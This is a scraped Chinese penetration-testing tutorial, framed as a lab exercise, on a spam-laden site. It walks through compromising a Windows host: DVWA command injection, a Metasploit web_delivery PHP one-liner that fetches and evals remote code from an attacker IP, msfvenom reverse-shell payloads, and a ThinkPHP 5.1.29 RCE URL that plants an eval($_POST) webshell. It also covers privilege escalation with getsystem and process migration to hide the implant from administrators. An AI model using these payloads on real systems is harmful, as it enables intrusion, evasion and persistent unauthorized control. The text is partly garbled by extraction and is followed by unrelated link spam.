当前位置: 首页 > news >正文

深圳好的外贸网站建设速成网站建设

深圳好的外贸网站建设,速成网站建设,建设一个网站要多久,顺义网站建设报价环境#xff1a;攻击机kali#xff08;192.168.129.139#xff09;#xff0c;目标机windows10#xff08;192.168.129.132#xff09; 方法一#xff1a;通过web站点#xff0c;使用无文件的方式攻击利用执行#xff08;命令执行漏洞#xff09; 方法二#xff1…环境攻击机kali192.168.129.139目标机windows10192.168.129.132 方法一通过web站点使用无文件的方式攻击利用执行命令执行漏洞 方法二通过web站点上传webshel返回给msfmsfvenom 方法三攻击其他端口服务拿到meterpreter(445) 一、Nmap端口收集 nmap -sV -T4  192.168.129.132(扫描的可能比较慢两个字等待) 这里以80作为突破口漏洞最多的就是它先打它 方式一、访问web站点寻找可能点(这里我使用小皮面板搭建的dvwa靶场) dirsearch  御剑  爆破目录 命令执行就是进行一个拼接 Vulnerability: Command Injection :: Damn Vulnerable Web Application (DVWA) ​​​​​​http://192.168.129.132/dvwa/vulnerabilities/exec/ 注意安全等级改为low 127.0.0.1ping自己 使用拼接命令 此处有命令执行的权限了就可以使用msf 利用命令执行漏洞结合上一章的知识我们可以怎么做?     msfvenom生成payload ①python : msfvenom  -p python/meterpreter/reverge_tcp LHOSTYour IP Address LPORTYour Port to Connect On -f raw shell.py ②bash : msfvenom -p cmd/unix/reverse_bash LHOSTYour, IP AddreasLPORTYoux, Port to Connect On -f rawshell.sh ③pexl : msfvenom -p cmd/unix/reverse_perl LHOSTYour,IP AddressLPORTくYour Port to Connect 0n -f rawshell.pl 1、当攻击者拥有部分受害者主机的控制权但还没有拿到一个完整的shell时web_delivery就派 上用场。 2、web delivery的主要目的是快速和受害者主机建立一条session。当受害者主机存在比如命令注 入、远程命令执行等问题时攻击者可以使用web delivery生成的一条命令建立连接。 3、另外web delivery的payload不会在受害者主机磁盘上写文件而是直接将攻击者服务器上的代 码加载到内存执行有利于绕过检测。 4、web delivery支持php/python/powershell等多种脚本使用不同的脚本的payload时需要通过set target或2来设置是使用php还是python还是powershell等。 因为判断出是php的所以可以做如下操作 ①use exploit/multi/script/web_delivery   //使用模块 ②show options  //显示可设置参数 ③set  lhost  指定目标ip    show targets  //查看设置php,python等等 set  target  编号 show options 再次查看配置 ④set  lport  指定端口 ⑤run 执行 会生成一段代码把代码复制在上述开始时的127.0.0.1的位置处粘贴运行 此时还没有完成因为没有配置php的环境变量注意对全部的用户进行配置方式一 干掉正占用的jobs 重新run执行 复制出生成的python代码注意要在一行 同理方式进行运行 此时目的达成拿到了meterpreter 操作步骤 前提测试拥有命令执行权限 ①进入kali linux  启动msf msfconsole 注意如果启动不成功就多次启动尝试一下 search  web_delivery  use  编号/需要的模块命令这里我使用第一种     use  1 show options  查看可以指定的payload set payload php/meterpreter/reverse_tcp set  lhost ip目标 set lport  端口 没有指定target show targets 查看要指定的target set target 1 show  options  查看 run 执行 进入客户端网站页面执行 部分1127.0.0.1 php -d allow_url_fopentrue -r eval(file_get_contents(http://192.168.129.132:8080/ncu6AXlH, false, stream_context_create([ssl[verify_peer  部分2 分为以上两个部分 这里的攻击机没有收到任何回显原因因为这里搭建是使用的phpstudy没有配置php的环境变 量如果和java一样配置了环境变量的话JDK 。有兴趣自己去试试吧 我的位置在C:\phpStudy\PHPTutorial\php看你安装位置了 注意对全部的用户进行配置 尝试使用命令行执行结果如下 这里有python我们切换python尝试 set target 0 注意payload改回python set payload python/meterpreter/reverse_tcp run执行 注意复制出来要一行可以使用notepad 使用back命令是返回上一级  background后台执行 客户端运行同理上 jobs查看已经运行的kill 编号 杀死在运行的    我这边显示服务器拒绝连接暂未解决,可能是版本的问题后续补上 成功后应如下图所示 sessions查看 session 2进入meterpreter 所有的杀毒软件都会栏powershell远程执行时一刀切(执行过程类似)和拔网线一样 方式二、访问web站点寻找可能点上传webshell 示例 dirsearch扫描 dirsearch可能kali中没有需要自己安装 方式一、apt-get安装 简单命令apt-get  install dirsearch ①一般用法: dirsearch  -u  url -e* 方式二、clone克隆方式 git clone https://github.com/maurosoria/dirsearch.git 然后在家目录进入dirsearch cd dirsearch 然后再使用命令 python3 dirsearch.py -u http//159.75.16.25 -e*    (-e*扫描所有文件)此处只展示使用方法不 是针对此案例的扫描 本示例开始 此版本php存在远程命令执行漏洞 上述帮助我们getshell 可以由此利用python和上传webshell进行攻击前面已经有python例子了此处我们使用上传 meterpreter功能很少要提权可能被IDS拦截后渗透可以使用免杀马和不死马进行上传。 这里我们上传(phpinfo,shell.php 执行如下 无报错 查看靶机上传成功 可以进行连接 适用webshell进行连接 蚁剑冰蝎哥斯拉菜刀等工具 此处使用蚁剑有时候使用这些工具时可能有莫名其妙的错误不行就换工具 此时拿到webshell了但它的权限很低要拿到meterpreter windows系统我们就有了上传权限linux操作系统我们就可以把木马上传到tmp目录下因为 tmp目录下可读可写可执行这是思露 马是msfvenom马上去执行拿到meterpreter很清晰吧 ①use exploit/multi/handler ②show options ③set payload windows/meterpreter_reverse_tcp ④set  lhost   set   lport ⑤run   进行监听这边监听者 复制此段windows/meterpreter_reverse_tcp msfvenom -p windows/x64/meterpreter/reverse_tcp  lhost192.168.129.139  lport9999  -f exe -o  test.exe 这边会生成test.exe把它上传到连接上webshell的机器肯定会查杀设置好后来到蚁 剑根据webshell上传test.exe文件 查看权限 是有可执行权限的右击在此处打开终端 此时kali中已经进入到了meterpreter 此时就可以去做一些事情了 ①getuid ②getsystem   简单提权使用注册表进行一个管道原理自己去了解一下吧 注意如果你是网站管理员你发现网站很卡很可能有别人种的病毒查任务管理器找到 test.exe结束了此进程那你就没得玩了 这边直接断了,那不行有什么办法作伪装加壳免杀如何伪装 查看进程id,进行进程迁移搞成正常进程 环境想让他再次跑起来如上操作run(kali)  stat  test.exe(蚁剑机)等待kali机回复 ①getpid ②ps 查看哪些进程在运行 高权限可以往低权限迁移反过来不行 ③getsystem  迁移到最高权限system ④进行迁移这里是最高权限之后迁 ⑤migrate  迁移id自己想迁移的觉得不会被容易发现的 此服务就将上传的木马文件迁移到了phpstudy中 分布式操作系统可以一对二自己去看原理 phpstudy没有断 此时就找不到test.exe了 这就是进程迁移 植入后门一般是植入到注册表里边 上述方式2我们是迁移到phpstydy,它是有文件的而方式1是没有没文件的内存中运行管理员 关掉就没了。再重启木马就被杀掉了方式2有后门怕后门查杀的话查杀注册表更容易被查 杀不推荐注册表了写一个东西以此开机运行 实验暂未做 thinkphp5.1.29下载链接https://pan.baidu.com/s/1b1l1HD0EP6c4uqtlSYokng  提取码burp 直接解压放大小皮面板的www目录下添加站点配置如下php版本注意 页面显示 测试漏洞http://192.168.129.132/thinkphp/html/public/index.php? s/index/\think\request/cachekeywhoami|system 上马http://192.168.129.132/thinkphp/html/public/index.php?sindex/\think\template\driver\file/writecacheFileshell.phpcontent%3C?php%20eval($_POST[c]);?%3E 执行结果如下 查看靶机上传成功真实场景是看不到的哈/html/public 此时可以使用shell.php去连接webshell(注意这里暂时先不使用代理) 双击成功连接webshell工具成功上线 连过之后此时就可以上传木马拿到webshell后拿到meterpreter拿到webshell windows系统 有上传权限执行权限。 上传msfvenom生成的马 注意这里的lhost是攻击机ip,lport要一致今天先到这里 这里一直连接不上防火墙有效负载监听设置网络访问和路由反病毒软件都检查了没排 出来 后期再补 多次尝试 一、Nmap端口收集 方式一、访问web站点寻找可能点(这里我使用小皮面板搭建的dvwa靶场) 操作步骤 方式二、访问web站点寻找可能点上传webshell 本示例开始
http://www.zqtcl.cn/news/614839/

相关文章:

  • 网站flsh怎么做能被百度收录的建站网站
  • 娄底网站seo建平台网站费用
  • seo优化网站的注意事项WordPress伪静态公告404
  • 手机网站自动适应沈阳网站建设公司电话
  • 备案号网站下边苏州广告公司招聘
  • 企业网站设计模板js做网站
  • 福州最好的网站建设公司网络策划
  • 威宁做网站西部数码网站管理助手 没有d盘
  • 网站设计基础知识重庆seo博客推广
  • 中小企业商务网站建设wordpress dmeng
  • 关于网站建设总结公司网站购买主机
  • 定制网站与模板网站网页美工设计师工资
  • 丹棱县 网站建设wordpress公司主题破解版
  • 贾汪微网站开发百度推广登录账号首页
  • 网站开发和网站运营的区别嘉兴市秀洲区住房和建设局网站
  • 西安网站开发公司哪家强如何做付费阅读网站
  • ios认证 东莞网站建设天津企业网站建设方案
  • 高网站排名吗wordpress 拼音别名
  • 网站出现的问题杭州旅游网站建设
  • 陕西城乡建设部网站怎么用自己注册的域名做网站
  • 企业邮箱注册价格汕头做网站优化的公司
  • 高校工会网站建设网站静态页面生成
  • 辽宁省营商环境建设局 网站做网站前端后端ui什么意思
  • 合作社网站模板贵州安顺建设主管部门网站
  • 网站不备案能访问吗哪家做企业网站
  • 做网站写的代号好跟不好的区别企信网企业信用信息系统
  • 网站需要服务器吗手机网站解决方案
  • 网站子网页怎么做国外网站 模板
  • 手机评测网站标志设计分析
  • 网页游戏网站建设成都公司网站